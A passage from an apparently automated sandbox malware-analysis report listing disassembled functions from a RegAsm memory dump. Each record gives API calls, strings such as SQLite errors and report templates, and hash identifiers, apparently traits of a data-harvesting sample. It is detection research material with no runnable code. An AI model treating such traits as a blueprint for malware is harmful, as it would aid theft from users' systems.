• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• API String ID: 4281309102-0
• Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
• Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
• Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscat
                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                • API String ID: 384018552-4153097237
                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2029023288-3849865405
                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                APIs
                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                • memset.MSVCRT ref: 00405455
                                                                                • memset.MSVCRT ref: 0040546C
                                                                                • memset.MSVCRT ref: 00405483
                                                                                • memcpy.MSVCRT ref: 00405498
                                                                                • memcpy.MSVCRT ref: 004054AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                • String ID: 6$\
                                                                                • API String ID: 404372293-1284684873
                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesErrorFileLastSleep$??3@
                                                                                • String ID:
                                                                                • API String ID: 1040972850-0
                                                                                • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                • String ID:
                                                                                • API String ID: 1331804452-0
                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                APIs
                                                                                Strings
                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                • <%s>, xrefs: 004100A6
                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf
                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                • API String ID: 3473751417-2880344631
                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2521778956-791839006
                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscpy
                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                • API String ID: 999028693-502967061
                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                • memset.MSVCRT ref: 0040C439
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                • String ID:
                                                                                • API String ID: 1973883786-0
                                                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004116FF
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 2618321458-3614832568
                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004185FC
                                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@AttributesFilememset
                                                                                • String ID:
                                                                                • API String ID: 776155459-0
                                                                                • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                • malloc.MSVCRT ref: 00417524
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                • String ID:
                                                                                • API String ID: 2308052813-0
                                                                                • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PathTemp$??3@
                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                • API String ID: 1589464350-1420421710
                                                                                • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                • String ID: Error$Error %d: %s
                                                                                • API String ID: 313946961-1552265934
                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                • API String ID: 0-1953309616
                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                APIs
                                                                                Strings
                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                • API String ID: 3510742995-272990098
                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: gj
                                                                                • API String ID: 1297977491-4203073231
                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                APIs
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                • String ID:
                                                                                • API String ID: 2903831945-0
                                                                                • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                • memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                • String ID:
                                                                                • API String ID: 1471605966-0
                                                                                • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                APIs
                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
